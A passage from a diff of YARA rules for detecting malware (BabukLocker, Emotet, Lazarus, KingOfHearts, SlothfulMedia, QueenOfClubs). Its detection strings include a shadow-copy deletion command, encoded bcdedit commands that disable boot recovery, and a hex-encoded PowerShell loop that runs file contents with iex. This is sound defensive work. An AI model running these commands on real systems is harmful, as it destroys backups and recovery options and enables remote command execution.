4a 74 5a 6e 4e 6f 5a 6e 56 73 5a 6e 68 6e 0a 09 6d 3d 5d }
+		$com1 = "os/exec.(*Cmd).Run" fullword ascii
+		$com2 = "os/exec.(*Cmd).Start" fullword ascii
+		$com3 = { 43 3a 5c 77 69 6e 64 6f 77 73 5c 74 65 6d 70 5c 73 31 2e 76 62 73 43 3a 5c 77 69 6e 64 6f 77 73 5c 74 65 6d 70 5c 73 32 2e 76 62 73 43 }
+		$str1 = { 63 6d 64 7a 63 7a 4e 68 63 73 }
+		$str2 = { 59 32 31 6b 4c 6d 56 34 5a 53 41 76 59 79 42 69 59 32 52 6c 5a 47 6c 30 4c 6d 56 34 5a 53 41 76 63 32 56 30 49 48 74 6b 5a 57 5a 68 64 57 78 30 66 53 42 69 62 32 39 30 63 33 52 68 64 48 56 7a 63 47 39 73 61 57 4e 35 49 47 6c 6e 62 6d 39 79 5a 57 46 73 62 47 5a 68 61 57 78 31 63 6d 56 7a }
+		$str3 = { 59 32 31 6b 4c 6d 56 34 5a 53 41 76 59 79 42 69 59 32 52 6c 5a 47 6c 30 4c 6d 56 34 5a 53 41 76 63 32 56 30 49 48 74 6b 5a 57 5a 68 64 57 78 30 66 53 42 79 5a 57 4e 76 64 6d 56 79 65 57 56 75 59 57 4a 73 5a 57 51 67 62 6d 38 3d }
 
 	condition:
-		uint32( 0 ) == 0x46445025 and filesize > 25KB and $x1 and 4 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 600KB and $seq and 2 of ( $com* ) and 2 of ( $str* )
 }
-rule ARKBIRD_SOLG_Ran_Babuklockers_Jan_2021_1 : FILE
+
+rule ARKBIRD_SOLG_APT_Lazarus_Stealer_Packed_July_2020_1 : FILE
 {
 	meta:
-		description = "Detect the BabukLocker ransomware"
+		description = "Detected Lazarus Strealer Packed by Thermida - July 2020"
 		author = "Arkbird_SOLG"
-		id = "a3bad41d-59fb-564f-a352-ca38af582c08"
-		date = "2020-01-03"
-		modified = "2021-01-03"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-01-02/BabukLocker/Ran_BabukLockers_Jan_2021_1.yar#L1-L23"
+		id = "325039a4-34c7-5144-93c0-61b013e30606"
+		date = "2020-07-23"
+		modified = "2023-11-22"
+		reference = "https://twitter.com/DeadlyLynn/status/1286233135751995397"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-07-23/Yara_Rule_APT_Lazarus_Stealer_July_2020_1.yar#L36-L66"
 		license_url = "N/A"
-		logic_hash = "8939e408948dd7b17acdac5c6b5f50db24ec63f19937b8663a15f52b678d0065"
-		score = 50
-		quality = 75
+		logic_hash = "f062c8f784133ad586490036757ff9d5e8a799e8abac94eeacf60743783e19ed"
+		score = 75
+		quality = 50
 		tags = "FILE"
-		hash1 = "8203c2f00ecd3ae960cb3247a7d7bfb35e55c38939607c85dbdb5c92f0495fa9"
-		level = "Experimental"
+		hash1 = "431e6784ef33f2b3963464458e73915875947b11348533544cc16c53af64740f"
+		hash2 = "70f45a7bbddda140695b953254650486733d8039c63e4eaeb454c1189a97989b"
 
 	strings:
-		$seq1 = { 55 8b ec 83 ec 14 a1 b0 81 40 00 33 c5 89 45 fc c7 45 f8 ff ff ff ff c7 45 f4 00 40 00 00 8d 45 f0 50 8b 4d 08 51 6a 13 6a 00 6a 02 e8 85 2b 00 00 85 c0 0f 85 a3 00 00 00 8b 55 f4 52 e8 ae 06 00 00 83 c4 04 89 45 08 83 7d 08 00 0f 84 81 00 00 00 8d 45 f4 50 8b 4d 08 51 8d 55 f8 52 8b 45 f0 50 e8 55 2b 00 00 85 c0 75 5c c7 45 ec 00 00 00 00 eb 09 8b 4d ec 83 c1 01 89 4d ec 8b 55 ec 3b 55 f8 73 40 8b 45 ec c1 e0 05 8b 4d 08 8b 54 01 0c 83 e2 02 74 14 8b 45 ec c1 e0 05 03 45  }
-		$seq2 = { 68 68 22 40 00 b8 04 00 00 00 c1 e0 00 8b 8d 9c fd ff ff 8b 14 01 52 ff 15 b8 90 40 00 85 c0 75 0c c7 85 b0 fd ff ff 01 00 00 00 eb 58 68 74 22 40 00 b8 04 00 00 00 c1 e0 00 8b 8d 9c fd ff ff 8b 14 01 52 ff 15 b8 90 40 00 85 c0 75 0c c7 85 b0 fd ff ff 00 00 00 00 eb 2b 68 80 22 40 00 b8 04 00 00 00 c1 e0 00 8b 8d 9c fd ff ff 8b 14 01 52 ff 15 b8 90 40 00 85 c0 75 0a c7 85 b0 fd ff ff ff ff ff ff e9 55 ff ff ff 6a 00 6a 00 ff 15 a8 90 40 00 e8 aa 04 00 00 e8 05 }
-		$seq3 = { 83 c4 0c 68 f4 00 00 00 8d 85 f4 fd ff ff 50 68 88 22 40 00 ff 15 6c 90 40 00 68 98 22 40 00 8d 8d f4 fd ff ff 51 ff 15 c4 90 40 00 c7 85 ec fd ff ff 00 00 00 00 6a 00 68 80 00 00 00 6a 01 6a 00 6a 01 68 00 00 00 40 8d 95 f4 fd ff ff 52 ff 15 70 90 40 00 89 85 98 fd ff ff 83 bd 98 fd ff ff ff 0f 84 2e 03 00 00 6a 00 8d 85 ec fd ff ff 50 68 90 00 00 00 68 78 82 40 00 8b 8d 98 fd ff ff 51 ff 15 90 90 }
-		$s1 = "\\ecdh_pub_k.bin" fullword wide
-		$s2 = "ntuser.dat.log" fullword wide
-		$s3 = "cmd.exe" fullword ascii
-		$s4 = "/c vssadmin.exe delete shadows /all /quiet" fullword wide
-		$s5 = { 5c 00 5c 00 3f 00 5c 00 00 00 00 00 3a 00 00 00 98 2f }
+		$s1 = "fill_win32_filefunc64" fullword ascii
+		$s2 = "gzfread" fullword ascii
+		$s3 = "deflateGetDictionary" fullword ascii
+		$s4 = "gzfwrite" fullword ascii
+		$s5 = "adler32_z" fullword ascii
+		$s6 = "@AJ<LxwBMDNCIFE}#SRV" fullword ascii
+		$s7 = "uncompress2" fullword ascii
+		$s8 = "zxyakauj" fullword ascii
+		$s9 = "gzfwrite" fullword ascii
+		$s10 = "tphfpzvy" fullword ascii
+		$s11 = "Dn.dll" fullword ascii
+		$s12 = ":USER32.8dl" fullword ascii
+		$s13 = "zlib data compression and ZIP file I/O library" fullword wide
+		$s14 = "Dn64.dll" fullword ascii
+		$s15 = "zlibwapi.dll" fullword ascii
+		$s16 = "CTRL+_" fullword ascii
+		$s17 = "ZLib.DLL" fullword ascii
+		$s18 = "(C) 1995-2017 Jean-loup Gailly & Mark Adler-" fullword ascii
+		$s19 = "zlib data compression and ZIP file I/O library" fullword ascii
+		$s20 = "DLL support by Alessandro Iacopetti & Gilles Vollant" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 15KB and 2 of ( $seq* ) and 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 550KB and pe.imphash ( ) == "baa93d47220682c04d92f7797d9224ce" and pe.exports ( "BZ2_bzInit" ) and pe.exports ( "BZ2_bzZip" ) and pe.exports ( "BZ2_bzZipW" ) and pe.exports ( "adler32_z" ) and pe.exports ( "crc32_z" ) and pe.exports ( "deflateGetDictionary" ) and 15 of them
 }
-rule ARKBIRD_SOLG_APT_MAL_Donot_Loader_June_2020_1 : FILE
+rule ARKBIRD_SOLG_MAL_Kingofhearts_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect loader malware used by APT Donot for drops the final stage"
+		description = "Detect KingOfHearts malware"
 		author = "Arkbird_SOLG"
-		id = "ec4cac12-529f-56d2-bbc0-5fe30424b10b"
-		date = "2020-06-22"
-		modified = "2020-06-22"
-		reference = "https://twitter.com/ccxsaber/status/1274978583463649281"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-22/APT_MAL_Donot_Loader_June_2020_1.yar#L3-L22"
+		id = "b1efb4db-3864-5fdc-a3a0-992734eaf22f"
+		date = "2021-07-09"
+		modified = "2021-07-12"
+		reference = "https://twitter.com/ShadowChasing1/status/1413111641504292864"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_KingOfHearts_Jul_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "986deffd48c1fb707948b00e1e200fa6538d4c73a32ab89f5119403f9bf0d734"
+		logic_hash = "6761958760997030693c832c75098890b0d6d34fd6fe9c60d68d611497d57419"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		hash1 = "1ff33d1c630db0a0b8b27423f32d15cc9ef867349ac71840aed47c90c526bb6b"
+		hash1 = "0639e8f5e517c3f57d28bfd9f51cabfb275c64b7bca224656c2ac04f5a8c3af0"
+		hash2 = "0340a90ed4000e579c29f6ad7d4ab2ae1d30f18a2e777689e3e576862efbd6e0"
+		hash3 = "393ccb9853ea7628792e4dd982c2dd52dd8f768fdb7b80b20cbfc2fac4e298a4"
+		tlp = "White"
+		adversary = "IAmTheKing"
 
 	strings:
-		$s1 = "C:\\Users\\spartan\\Documents\\Visual Studio 2010\\new projects\\frontend\\Release\\test.pdb" fullword ascii
-		$s2 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Edg/81.0.416.68" fullword ascii
-		$s3 = "bbLorkybbYngxkjbb]khbbmgvjgz4k~k" fullword ascii
-		$s4 = "8&8-8X8.959?9Q9h9v9|9" fullword ascii
-		$s5 = "0$0h4h5l5p5t5x5|5" fullword ascii
-		$s6 = "?&?+?1?7?M?T?g?z?" fullword ascii
-		$s7 = "12.02.1245" fullword ascii
-		$s8 = ">>?C?L?[?~?" fullword ascii
-		$s9 = "6*6=6P6b6" fullword ascii
+		$s1 = { 43 00 72 00 65 00 61 00 74 00 65 00 44 00 6f 00 77 00 6e 00 4c 00 6f 00 61 00 64 00 46 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 46 00 61 00 69 00 6c 00 65 00 64 00 2c 00 45 00 72 00 72 00 6f 00 72 00 3d 00 25 00 64 }
+		$s2 = { 43 00 72 00 65 00 61 00 74 00 65 00 55 00 70 00 4c 00 6f 00 61 00 64 00 46 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 }
+		$s3 = "HARDWARE\\DESCRIPTION\\System\\BIOS" fullword ascii
+		$s4 = "\\1-driver-vmsrvc" fullword ascii
+		$s5 = { 73 74 61 72 74 20 64 6f 77 6e 3a 20 25 73 0a }
+		$s6 = { 66 00 69 00 6c 00 65 00 20 00 64 00 65 00 6c 00 65 00 74 00 65 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 20 00 22 00 25 00 73 00 22 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and 7 of them
+		uint16( 0 ) == 0x5a4d and filesize > 35KB and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Emotet_Nov_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Slothfulmedia_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect Emotet loader"
+		description = "Detect SlothfulMedia malware"
 		author = "Arkbird_SOLG"
-		id = "ad67c735-7ed9-5440-b693-55dce9840f56"
-		date = "2021-11-15"
-		modified = "2021-11-16"
-		reference = "https://cyber.wtf/2021/11/15/guess-whos-back/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-16/MAL_Emotet_Nov_2021_1.yara#L1-L19"
+		id = "f4e1eca6-ecc9-5911-b69e-c8c4de43f1a1"
+		date = "2021-07-09"
+		modified = "2021-07-12"
+		reference = "hhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_SlothfulMedia_Jul_2021_1.yara#L1-L26"
 		license_url = "N/A"
-		logic_hash = "9ae3cbf863fdf3addd7ec00b4d6b55024c3159156518ef15fff79f5a92988297"
+		logic_hash = "929364cbb9854336641590d53ee9c4548f02845e26252d359b155e4c2b1032ca"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		hash1 = "0865bd192e226da2c40b8bdd33a65ef41ca255a0031b3b36ab6a657ba6675d5e"
-		hash2 = "14613fa0b6eea4cd9205ffbe1c462178c94298707d19f78a27eec3dece8765f0"
-		tlp = "white"
-		adversary = "TrickBot Gang"
+		hash1 = "04ca010f4c8997a023fabacae230698290e3ff918a86703c5e0a2a6983b039eb"
+		hash2 = "927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae"
+		hash3 = "ed5258306c06d6fac9b13c99c7c8accc7f7fa0de4cf4de4f7d9eccad916555f5"
+		tlp = "White"
+		adversary = "IAmTheKing"
 
 	strings:
-		$s1 = { 8b 4d 08 0f b6 02 0f b6 31 2b f0 75 18 0f b6 71 01 0f b6 42 01 2b f0 75 0c 0f b6 71 02 0f b6 42 02 2b f0 74 10 33 c9 85 f6 0f 9f c1 8d 0c 4d ff ff ff ff eb 1a 0f b6 49 03 0f b6 42 03 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 8b c1 eb 56 8b 4d 08 8b 75 0c 0f b6 11 0f b6 06 2b d0 75 0c 0f b6 51 01 0f b6 46 01 2b d0 74 06 33 c9 85 d2 eb b4 0f b6 49 02 0f b6 46 02 eb be 8b 4d 08 8b 75 0c 0f b6 11 0f b6 06 2b d0 75 e0 0f b6 49 01 0f b6 46 01 eb a4 8b 45 08 0f b6 08 8b 45 0c 0f b6 00 eb 96 33 c0 5e 5b 5d c3 8b ff }
-		$s2 = { 8b 75 10 83 e0 3f 8b 5d 18 6b c8 38 c1 fa 06 89 75 a0 89 5d c4 89 55 b0 8b 04 95 [2] 03 10 89 4d bc 8b 44 08 18 89 45 9c 8b 45 14 03 c6 89 45 ac ff 15 ?? 40 03 10 80 7b 14 00 89 45 90 75 07 8b cb e8 [2] ff ff 8b 43 0c 8b 75 08 8b fe 8b 40 08 89 45 98 33 c0 ab ab ab 8b 45 a0 8b d0 89 55 d0 3b 45 ac 0f 83 14 03 00 00 8b 7d bc 33 db 89 5d b8 81 7d 98 e9 fd 00 00 8a 02 88 45 cf 8b 45 b0 89 5d c0 c7 45 d4 01 00 00 00 8b 0c 85 }
-		$s3 = { 53 53 40 6a 05 89 45 d0 8d 45 d8 50 ff 75 d4 8d 45 c0 50 53 ff 75 90 e8 [2] ff ff 83 c4 20 89 45 c8 85 c0 0f 84 00 01 00 00 53 8d 4d a4 51 50 8d 45 d8 50 ff 75 9c ff 15 ?? 40 03 10 85 c0 0f 84 dd 00 00 00 8b 55 d0 8b ca 2b 4d a0 8b 46 08 03 c1 89 45 b8 89 46 04 8b 45 c8 39 45 a4 0f 82 c6 00 00 00 80 7d cf 0a 75 3c 6a 0d 58 53 66 89 45 a8 8d 45 a4 50 6a 01 8d 45 a8 50 ff 75 9c ff 15 ?? 40 03 10 85 c0 0f 84 95 00 00 00 83 7d a4 01 0f 82 93 00 00 00 ff 46 08 ff 46 04 8b 46 04 8b 55 d0 89 45 b8 3b 55 ac 0f 82 6f fd ff ff eb 79 85 }
-		$s4 = { ba 08 00 00 00 c1 e2 00 8b 45 f0 8b 4c 10 78 03 4d fc 89 4d f8 ba 08 00 00 00 6b c2 0c 8b 4d f0 83 7c 01 78 00 74 09 c7 45 e8 0c 00 00 00 eb 07 c7 45 e8 01 00 00 00 8b 55 e8 89 55 e4 8b 45 e4 8b 4d f0 8b 54 c1 78 89 55 dc 8b 45 e4 8b 4d f0 8b 54 c1 7c 89 55 d8 8b 45 dc 03 45 fc 89 45 d4 8d 4d c8 51 6a 04 8b 55 d8 52 8b 45 d4 50 ff 15 04 40 03 10 8b 4d f8 83 79 0c 00 0f 84 cf }
-		$s5 = { 83 20 00 33 c9 21 4d e8 53 8b 5d 08 57 33 ff 89 4d e4 89 7d e0 8b 03 85 c0 74 56 8d 4d fc 66 c7 45 fc 2a 3f 51 50 c6 45 fe 00 e8 12 55 00 00 59 59 85 c0 75 1a 8d 45 e0 50 33 c0 50 50 ff 33 e8 13 01 00 00 8b f0 83 c4 10 85 f6 75 74 eb 13 8d 4d e0 51 50 ff 33 e8 ad 01 00 00 83 c4 0c 85 c0 75 1d 83 c3 04 8b 03 }
+		$s1 = { 5c 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 25 00 30 00 34 00 78 00 25 00 30 00 34 00 78 00 5c 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e }
+		$s2 = "\\VarFileInfo\\Translation" fullword wide
+		$s3 = { 5c 00 46 00 69 00 6c 00 74 00 65 00 72 00 [2-8] 2e 00 6a 00 70 00 67 }
+		$s4 = "\\SetupUi" fullword wide
+		$s5 = { 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 }
+		$s6 = { 47 00 6c 00 6f 00 62 00 61 00 6c 00 5c 00 25 00 73 00 25 00 64 }
+		$s7 = { 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 25 64 }
+		$s8 = { 45 00 72 00 61 00 20 00 75 00 70 00 6c 00 6f 00 61 00 64 00 3a 00 25 00 73 00 20 00 25 00 64 }
+		$s9 = "ExtKeyloggerStart" fullword ascii
+		$s10 = "ExtKeyloggerStop" fullword ascii
+		$s11 = "ExtServiceDelete" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 30KB and 4 of them
+		uint16( 0 ) == 0x5a4d and filesize > 20KB and 8 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Lazarus_Jun_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Queenofclubs_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect a variant of NukeSped malware"
+		description = "Detect QueenOfClubs malware"
 		author = "Arkbird_SOLG"
-		id = "0f5d42c0-d6dc-573b-9227-787ccbcaa83d"
-		date = "2021-06-19"
-		modified = "2021-06-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-19/Lazarus/APT_Lazarus_Jun_2021_1.yara#L1-L20"
+		id = "d78df760-5753-528c-b03d-7bb91ec658c0"
+		date = "2021-07-09"
+		modified = "2021-07-12"
+		reference = "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_QueenOfClubs_Jul_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "ea4ce93d54b9b8e5d1d5bb64d37ac26839e2fa3200da3057597d83c4be6d129f"
+		logic_hash = "c6fe9dd24098ef3c281d9e6727613499988c88b9d2011af77390e0ce358bebf4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "5c2f339362d0cd8e5a8e3105c9c56971087bea2701ea3b7324771b0ea2c26c6c"
-		hash2 = "2dff6d721af21db7d37fc1bd8b673ec07b7114737f4df2fa8b2ecfffbe608a00"
-		hash3 = "1177105e51fa02f9977bd435f9066123ace32b991ed54912ece8f3d4fbeeade4"
+		hash1 = "b0a1da4fc5526365df495094f65660d88487ce5e60192e5fb4075e815f9481d3"
 		tlp = "White"
-		adversary = "Lazarus"
+		adversary = "IAmTheKing"
 
 	strings:
-		$seq1 = { 48 8b ce e8 8a 2c 00 00 48 8b d8 48 85 c0 0f 84 28 06 00 00 4c 8b c6 33 d2 48 8b c8 e8 11 56 00 00 8d 4e fc 48 8d 57 04 4c 63 c1 48 8b cb e8 af 3a 00 00 33 c0 48 8d 4c 24 30 48 89 4c 24 28 45 33 c9 4c 8b c3 33 d2 33 c9 89 44 24 30 89 44 24 20 ff 15 4b 49 01 00 48 85 c0 0f 84 d4 05 00 00 ba 88 13 00 00 48 8b c8 ff 15 9c 2c 02 00 48 8d 8d 91 00 00 00 33 d2 41 b8 ff 03 00 00 c6 85 90 00 00 00 00 e8 a9 55 00 00 48 8d 15 02 c1 01 00 48 8d 8d 90 00 00 00 e8 16 2b 00 00 48 8d 85 90 00 00 00 48 83 cb ff 48 ff c3 80 3c 18 00 75 f7 41 b2 84 ba 43 90 21 57 41 b8 c2 a2 a9 09 85 db 0f 8e 4b 05 00 00 4c 8d 8d 90 00 00 00 44 8b db 66 90 41 0f b6 01 41 0f b6 c8 4d 8d 49 01 32 ca 41 32 c2 44 22 d1 41 32 c0 42 8d 0c c5 00 00 00 00 32 c2 41 33 c8 41 88 41 ff 81 e1 f8 07 00 00 41 0f b6 c0 22 c2 c1 e1 14 44 32 d0 41 8b c0 44 8b c1 c1 e8 08 8d 0c 12 33 ca 44 0b c0 8b c2 c1 e1 04 c1 e0 07 33 ca 83 e1 80 33 c8 8b c2 c1 e1 11 c1 e8 08 8b d1 0b d0 49 ff }
-		$seq2 = { 48 8d ac 24 50 ff ff ff 48 81 ec b0 01 00 00 48 8b 05 82 09 02 00 48 33 c4 48 89 85 a0 00 00 00 44 8b 25 d5 38 02 00 4c 8b f9 48 8d 4d 91 33 d2 41 b8 03 01 00 00 c6 45 90 00 e8 59 66 00 00 b9 3c 00 00 00 ff 15 f6 3c 02 00 ff 15 88 59 01 00 8b c8 e8 51 42 00 00 e8 20 42 00 00 b9 3c 00 00 00 8b d8 83 e3 03 83 c3 08 ff 15 d1 3c 02 00 ff 15 63 59 01 00 8b c8 e8 2c 42 00 00 e8 fb 41 00 00 b9 3c 00 00 00 8b f8 83 e7 01 83 c7 05 ff 15 ac 3c 02 00 ff 15 3e 59 01 00 8b c8 e8 07 42 00 00 e8 d6 41 00 00 8b f0 b8 ab aa aa aa f7 e6 d1 ea 8d 0c 52 2b f1 83 eb 08 0f 84 30 03 00 00 ff cb 0f 84 68 02 00 00 ff cb 0f 84 9a 01 00 00 ff cb 0f 85 ef 04 00 00 8d 4b 3c ff 15 60 3c 02 00 ff 15 f2 58 01 00 8b c8 e8 bb 41 00 00 e8 8a 41 00 00 8b d8 b8 1f 85 eb 51 f7 e3 c1 ea 03 6b ca 19 2b d9 b9 3c 00 00 00 83 c3 0a ff 15 2f 3c 02 00 ff 15 c1 58 01 00 8b c8 e8 8a 41 00 00 e8 59 41 00 00 44 8b f0 b8 ab aa aa aa 41 f7 e6 c1 ea 02 8d 0c 52 03 c9 44 2b f1 b9 3c 00 00 00 41 81 c6 d7 07 00 00 ff 15 f5 3b 02 00 ff 15 87 58 01 00 8b c8 e8 50 41 00 00 e8 1f 41 00 00 44 8b e8 b8 ab aa aa aa 41 f7 e5 c1 ea 03 8d 0c 52 c1 e1 02 44 2b e9 b9 3c 00 00 00 41 ff c5 ff 15 be 3b 02 00 ff 15 50 58 01 00 8b c8 e8 19 41 00 00 e8 e8 40 00 00 44 8b c0 b8 09 cb 3d 8d 41 f7 e0 c1 ea 04 6b ca 1d 44 2b c1 b9 7d 00 00 00 41 ff c0 44 89 44 24 74 e8 3e 3b 00 00 33 d2 44 8d 42 7d 48 8b c8 e8 d0 64 00 00 4c 8d 44 24 70 48 8d 0d d4 ce 01 00 ba 7c 00 00 00 c7 44 24 70 00 00 00 00 e8 c2 27 00 00 44 8b 44 24 70 48 8b d0 48 8b c8 48 89 44 24 78 e8 3d 25 00 00 48 8b 44 24 78 4c 8d 45 90 48 8b d0 4c 2b c0 0f 1f 40 00 66 66 0f 1f 84 00 00 00 00 00 0f b6 0a 48 8d 52 01 41 88 4c 10 ff 84 c9 75 f0 48 8b c8 e8 88 3a 00 00 8b 44 24 74 44 89 64 24 48 89 5c 24 40 89 44 24 38 44 89 6c 24 30 48 8d 55 90 44 8b cf 41 b8 04 00 00 00 49 8b cf 44 89 74 24 28 89 74 24 20 e8 b4 39 00 00 e9 5d 03 00 00 b9 3c 00 00 00 ff 15 cc 3a 02 00 ff 15 5e 57 01 00 8b c8 e8 27 40 00 00 e8 f6 3f 00 00 b9 79 00 00 00 8b d8 83 e3 03 e8 63 3a 00 00 33 d2 44 8d 42 79 48 8b c8 e8 f5 63 00 00 4c 8d 44 24 70 48 8d 0d 79 cd 01 00 ba 78 00 00 00 c7 44 24 70 00 00 00 00 e8 e7 26 00 00 44 8b 44 24 70 48 8b d0 48 8b c8 4c 8b f0 e8 64 24 00 00 4c 8d 45 90 49 8b d6 4d 2b c6 66 66 0f 1f 84 00 00 00 00 00 0f b6 0a 48 8d 52 01 41 88 4c 10 ff 84 c9 75 f0 49 8b ce e8 b8 39 00 00 44 89 64 24 38 8d 43 04 89 44 24 30 44 8d 4b 08 48 8d 55 90 41 b8 04 00 00 00 49 8b cf 89 74 24 28 89 }
-		$seq3 = { 48 89 5c 24 18 55 56 57 48 83 ec 70 48 8b 05 9d fe 01 00 48 33 c4 48 89 44 24 60 33 c0 48 8b d9 8b fa 8d 48 20 c6 44 24 48 00 48 89 44 24 49 48 89 44 24 51 e8 d7 31 00 00 48 8d 15 44 c6 01 00 48 8b f0 33 c0 48 8d 4c 24 48 48 89 06 48 89 46 08 48 89 46 10 4c 8b c3 48 89 46 18 e8 3f 13 00 00 48 8d 4c 24 48 ff 15 ac 50 01 00 bd 02 00 00 00 0f b7 cf 89 44 24 3c 66 89 6c 24 38 ff 15 a5 2e 02 00 8d 55 ff 44 8d 45 04 8b cd 66 89 44 24 3a ff 15 01 32 02 00 48 8b f8 48 83 f8 ff 75 20 48 8d 15 e1 c5 01 00 48 8b ce e8 81 30 00 00 48 0b df 48 ff c3 80 3c 1e 00 75 f7 e9 c9 00 00 00 48 8d 54 24 38 41 b8 10 00 00 00 48 8b c8 ff 15 f4 31 02 00 83 f8 ff 75 6b 48 8d 15 a8 c5 01 00 48 8b ce e8 48 30 00 00 48 83 cb }
-		$seq4 = { 40 55 48 8d ac 24 e0 fb ff ff 48 81 ec 20 05 00 00 48 8b 05 b8 fc 01 00 48 33 c4 48 89 85 10 04 00 00 48 8d 8d f1 00 00 00 33 d2 41 b8 03 01 00 00 c6 85 f0 00 00 00 00 e8 93 59 00 00 48 8d 8d 01 02 00 00 33 d2 41 b8 07 02 00 00 c6 85 00 02 00 00 00 e8 78 59 00 00 48 8d 4d e1 33 d2 41 b8 03 01 00 00 c6 45 e0 00 e8 63 59 00 00 48 8d 95 f0 00 00 00 41 b8 f4 01 00 00 33 c9 ff 15 2e 30 02 00 85 c0 0f 84 5e 01 00 00 48 8d 55 e0 b9 f4 01 00 00 48 89 9c 24 30 05 00 00 48 89 bc 24 38 05 00 00 ff 15 17 30 02 00 4c 8d 05 20 15 02 00 48 8d 4d e0 ba 04 01 00 00 e8 5a 37 00 00 48 8d 45 e0 4c 8d 0d f7 14 02 00 48 89 44 24 28 48 8d 85 f0 00 00 00 4c 8d 85 f0 00 00 00 48 8d 15 dd c3 01 00 48 8d 8d 00 02 00 00 48 89 44 24 20 e8 fc 10 00 00 33 ff 48 8d 4d e0 48 89 7c 24 30 44 8d 47 03 45 33 c9 ba 00 00 00 40 c7 44 24 28 80 00 00 00 c7 44 24 20 02 00 00 00 ff 15 6f 2f 02 00 48 8b d8 }
-		$seq5 = { 48 89 5c 24 10 48 89 74 24 18 48 89 7c 24 20 55 48 8d ac 24 70 f2 ff ff 48 81 ec 90 0e 00 00 48 8b 05 da ed 01 00 48 33 c4 48 89 85 80 0d 00 00 48 8b f1 48 8d 8d 81 05 00 00 33 d2 41 b8 ff 07 00 00 c6 85 80 05 00 00 00 e8 b2 4a 00 00 48 8d 4d 71 33 d2 41 b8 03 01 00 00 c6 45 70 00 e8 9d 4a 00 00 33 c0 c6 44 24 50 00 39 05 f4 1c 02 00 89 44 24 51 75 0b e8 b5 dd ff ff 89 05 e3 1c 02 00 48 8d 4d 70 e8 c6 e3 ff ff 8b 05 e8 b5 01 00 48 8d 8d 81 01 00 00 89 44 24 50 0f b6 05 da b5 01 00 33 d2 41 b8 ff 03 00 00 c6 85 80 01 00 00 00 88 44 24 54 e8 46 4a 00 00 48 8d 15 3f b6 01 00 48 8d 8d 80 01 00 00 e8 b3 1f 00 00 48 8d 4d 90 33 d2 0f 10 05 b6 b6 01 00 0f 10 0d bf b6 01 00 41 b8 d4 00 00 00 0f 29 44 24 60 0f 29 4c 24 70 0f 10 05 b8 b6 01 00 0f 29 45 80 e8 ff 49 00 00 48 83 cb ff 48 8b c3 0f 1f 84 }
+		$s1 = { 66 00 6f 00 72 00 28 00 3b 00 3b 00 29 00 7b 00 24 00 53 00 3d 00 47 00 65 00 74 00 2d 00 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 20 00 22 00 25 00 73 00 22 00 3b 00 49 00 46 00 28 00 24 00 53 00 29 00 7b 00 22 00 22 00 20 00 3e 00 20 00 22 00 25 00 73 00 22 00 3b 00 24 00 74 00 3d 00 69 00 65 00 78 00 20 00 24 00 53 00 20 00 32 00 3e 00 22 00 25 00 73 00 22 00 3b 00 24 00 74 00 3d 00 24 00 74 00 2b 00 27 00 20 00 27 00 3b 00 65 00 63 00 68 00 6f 00 20 00 24 00 74 00 20 00 3e 00 3e 00 22 00 25 00 73 00 22 00 3b 00 7d 00 73 00 6c 00 65 00 65 00 70 00 20 00 2d 00 6d 00 20 00 36 00 30 00 30 00 3b 00 7d }
